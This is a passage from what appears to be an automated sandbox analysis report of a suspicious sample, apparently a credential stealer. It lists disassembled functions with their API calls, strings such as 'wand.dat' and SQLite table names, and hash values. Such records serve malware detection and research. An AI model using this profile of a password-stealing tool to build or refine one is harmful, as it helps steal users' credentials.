                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: MessageSendmemset
                                        • String ID: AE$"
                                        • API String ID: 568519121-1989281832
                                        • Opcode ID: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                        • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                        • Opcode Fuzzy Hash: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                        • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                        Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 0040D58D
                                        • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                        • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ChildEnumTextWindowWindowsmemset
                                        • String ID: caption
                                        • API String ID: 1523050162-4135340389
                                        • Opcode ID: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                        • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                        • Opcode Fuzzy Hash: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                        • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                        Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                          • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                        • CreateFontIndirectW.GDI32(?), ref: 00401156
                                        • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                        • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                        • String ID: MS Sans Serif
                                        • API String ID: 210187428-168460110
                                        • Opcode ID: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                        • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                        • Opcode Fuzzy Hash: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                        • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                        Function 00409D7F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ClassName_wcsicmpmemset
                                        • String ID: edit
                                        • API String ID: 2747424523-2167791130
                                        • Opcode ID: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                        • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                        • Opcode Fuzzy Hash: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                        • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                        Function 00414E13 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                          • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                        • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                        • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                        • String ID: SHAutoComplete$shlwapi.dll
                                        • API String ID: 3150196962-1506664499
                                        • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                        • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                        • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                        • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                        Function 0041D893 Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                        Download Yara Rule
                                        APIs
                                        • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                        • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                        • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                        • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                        • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy$memcmp
                                        • String ID:
                                        • API String ID: 3384217055-0
                                        • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                        • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                        • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                        • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                        Function 00412A2A Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$memcpy
                                        • String ID:
                                        • API String ID: 368790112-0
                                        • Opcode ID: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                        • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                        • Opcode Fuzzy Hash: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                        • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                        Function 00410D9B Relevance: 6.2, APIs: 4, Instructions: 169windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                          • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                          • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                          • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                          • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                        • GetMenu.USER32(?), ref: 00410F8D
                                        • GetSubMenu.USER32(00000000), ref: 00410F9A
                                        • GetSubMenu.USER32(00000000), ref: 00410F9D
                                        • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                        • String ID:
                                        • API String ID: 1889144086-0
                                        • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                        • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                        • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                        • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                        Function 00417FD5 Relevance: 6.1, APIs: 4, Instructions: 138fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                        • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                        • GetLastError.KERNEL32 ref: 0041810A
                                        • CloseHandle.KERNEL32(00000000), ref: 00418120
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: File$CloseCreateErrorHandleLastMappingView
                                        • String ID:
                                        • API String ID: 1661045500-0
                                        • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                        • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                        • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                        • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                        Function 0042EB92 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 133COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                        • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                        Strings
                                        • virtual tables may not be altered, xrefs: 0042EBD2
                                        • Cannot add a column to a view, xrefs: 0042EBE8
                                        • sqlite_altertab_%s, xrefs: 0042EC4C
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpymemset
                                        • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                        • API String ID: 1297977491-2063813899
                                        • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                        • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                        • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                        • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                        Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 0040560C
                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                          • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                          • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                          • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                          • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                          • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                          • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                          • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                          • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                          • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                          • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                          • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                        • String ID: *.*$dat$wand.dat
                                        • API String ID: 2618321458-1828844352
                                        • Opcode ID: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                        • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                        • Opcode Fuzzy Hash: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                        • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                        Function 00410C46 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                          • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                        • wcslen.MSVCRT ref: 00410C74
                                        • _wtoi.MSVCRT(?,?,00000000,00000000,00000000,?,00000000), ref: 00410C80
                                        • _wcsicmp.MSVCRT ref: 00410CCE
                                        • _wcsicmp.MSVCRT ref: 00410CDF
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                        • String ID:
                                        • API String ID: 1549203181-0
                                        • Opcode ID: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                        • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                        • Opcode Fuzzy Hash: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                        • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                        Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00412057
                                          • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,Function_0004E518,Function_0004E518,00000005), ref: 0040A12C
                                        • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                        • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                        • GetKeyState.USER32(00000010), ref: 0041210D
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                        • String ID:
                                        • API String ID: 3550944819-0
                                        • Opcode ID: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                        • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                        • Opcode Fuzzy Hash: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                        • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                        Function 0040F508 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                        Download Yara Rule
                                        APIs
                                        • free.MSVCRT ref: 0040F561
                                        • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                        • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy$free
                                        • String ID: g4@
                                        • API String ID: 2888793982-2133833424
                                        • Opcode ID: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                        • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                        • Opcode Fuzzy Hash: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                        • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                        Function 0041298C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                        Download Yara Rule
                                        APIs
                                        • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                        • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                        • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy
                                        • String ID: @
                                        • API String ID: 3510742995-2766056989
                                        • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                        • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                        • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                        • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                        Function 0040AED2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                        • memset.MSVCRT ref: 0040AF18
                                        • memcpy.MSVCRT(0045A474,?,00000000,00000000,00000000,00000000,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??2@??3@memcpymemset
                                        • String ID:
                                        • API String ID: 1865533344-0
                                        • Opcode ID: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                        • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                        • Opcode Fuzzy Hash: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                        • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                        Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 004144E7
                                          • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                          • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                        • memset.MSVCRT ref: 0041451A
                                        • GetPrivateProfileStringW.KERNEL32(?,?,Function_0004E518,?,00002000,?), ref: 0041453C
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                        • String ID:
                                        • API String ID: 1127616056-0
                                        • Opcode ID: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                        • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                        • Opcode Fuzzy Hash: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                        • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                        Function 0042FE8B Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                        Download Yara Rule
                                        APIs
                                        • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                        • memset.MSVCRT ref: 0042FED3
                                        • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy$memset
                                        • String ID: sqlite_master
